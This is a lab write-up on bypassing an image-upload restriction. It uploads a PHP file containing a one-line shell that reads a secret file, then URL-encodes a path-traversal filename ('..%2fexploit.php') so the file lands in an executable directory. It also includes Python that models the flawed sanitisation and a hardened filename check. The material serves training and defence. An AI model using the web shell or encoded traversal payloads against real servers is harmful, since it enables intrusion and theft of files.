Web shell upload via path traversal
Description
This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability.
Reproduction and proof of concept
1. Log in and upload an image as your avatar, then go back to your account page.
2. In Burp, go to Proxy -> HTTP history and notice that your image was fetched using a GET request to /files/avatars/<YOUR-IMAGE>. Send this request to Burp Repeater.
3. On your system, create a file called exploit.php, containing a script for fetching the contents of Carlos's secret. For example:
   <?php echo file_get_contents('/home/carlos/secret'); ?>
4. Upload this script as your avatar. Notice that the website doesn't seem to prevent you from uploading PHP files.
5. In Burp Repeater, go to the tab containing the GET /files/avatars/<YOUR-IMAGE> request. In the path, replace the name of your image file with exploit.php and send the request. Observe that instead of executing the script and returning the output, the server has just returned the contents of the PHP file as plain text.
6. In Burp's proxy history, find the POST /my-account/avatar request that was used to submit the file upload and send it to Burp Repeater.
7. In Burp Repeater, go to the tab containing the POST /my-account/avatar request and find the part of the request body that relates to your PHP file. In the Content-Disposition header, change the filename to include a directory traversal sequence:
   Content-Disposition: form-data; name="avatar"; filename="../exploit.php"
8. Send the request. Notice that the response says "The file avatars/exploit.php has been uploaded". This suggests that the server is stripping the directory traversal sequence from the file name.
9. Obfuscate the directory traversal sequence by URL encoding the forward slash (/) character, resulting in:
   filename="..%2fexploit.php"
10. Send the request. The message now says "The file avatars/../exploit.php has been uploaded". This indicates that the file name is being URL decoded by the server.
11. In the browser, go back to the account page.
12. In Burp's proxy history, find the GET /files/avatars/..%2fexploit.php request. This gives a 404 response. But you can request this file using GET /files/exploit.php.
13. Submit the secret to solve the lab.
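The root cause in steps 8 to 10 is an ordering bug: the server strips "../" from the raw filename and only afterwards URL-decodes it, so "..%2f" survives the filter and becomes "../" on disk. The following Python is an added example (not code from the lab or from PortSwigger) that models that behaviour next to a hardened filename check which decodes first, rejects any path separator, enforces an image-extension allow-list, and confirms the resolved path stays inside the upload directory. The upload directory /var/www/files/avatars and the allow-list are assumptions made for the illustration; naive_resolve is a reconstruction of the server logic inferred from the lab's responses, not its actual source.

```python
"""Filename sanitisation for an avatar upload: the ordering bug from the lab
next to a hardened check. Paths and extensions below are assumed values."""
import posixpath
from urllib.parse import unquote

UPLOAD_DIR = "/var/www/files/avatars"        # assumed avatars directory
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}   # assumed allow-list


def naive_resolve(filename: str) -> str:
    """Reconstruction of the vulnerable order of operations: strip traversal
    sequences from the raw name, THEN URL-decode, then join onto the directory.
    An encoded slash ("..%2f") is untouched by the strip and decodes to "../"."""
    stripped = filename.replace("../", "").replace("..\\", "")
    decoded = unquote(stripped)
    return posixpath.normpath(posixpath.join(UPLOAD_DIR, decoded))


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Decode until stable so double-encoded input ("..%252f") is also seen."""
    for _ in range(max_rounds):
        nxt = unquote(value)
        if nxt == value:
            return value
        value = nxt
    return value


def safe_filename(filename: str) -> str:
    """Hardened check: canonicalise first, then validate the canonical form.
    Raises ValueError on anything that is not a bare, allow-listed file name."""
    decoded = fully_decode(filename)
    if not decoded or decoded in (".", ".."):
        raise ValueError("empty or reserved filename")
    if "/" in decoded or "\\" in decoded or "\x00" in decoded:
        raise ValueError("path separators or NUL bytes are not allowed")
    _, ext = posixpath.splitext(decoded)
    if ext.lower() not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {ext!r} is not an allowed image type")
    return decoded


def safe_resolve(filename: str) -> str:
    """Validate the name and assert the final path still sits in UPLOAD_DIR."""
    target = posixpath.normpath(posixpath.join(UPLOAD_DIR, safe_filename(filename)))
    if posixpath.dirname(target) != UPLOAD_DIR:
        raise ValueError("resolved path escapes the upload directory")
    return target


def is_inside_upload_dir(path: str) -> bool:
    """True when the resolved path is a direct child of UPLOAD_DIR."""
    return posixpath.dirname(path) == UPLOAD_DIR


def rejected(filename: str) -> bool:
    """Convenience wrapper: does the hardened check refuse this name?"""
    try:
        safe_resolve(filename)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed sample filenames mirroring the lab's steps plus one double-encoded variant.
    for name in ("avatar.png", "../exploit.php", "..%2fexploit.php", "..%252fexploit.php"):
        naive = naive_resolve(name)
        verdict = "rejected" if rejected(name) else safe_resolve(name)
        print(f"{name:22} naive -> {naive:40} inside={is_inside_upload_dir(naive)} | hardened -> {verdict}")
```

Running the script shows "..%2fexploit.php" landing at /var/www/files/exploit.php under the naive logic (exactly the location the lab ends up serving from), while the hardened check refuses every traversal variant and still accepts avatar.png. The design point is to validate the canonical, fully decoded name rather than pattern-stripping the raw one, and to pair that with an extension allow-list and a non-executing storage location.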
Exploitability
An attacker will need to log in; upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret; and then enter this secret using the button provided in the lab banner.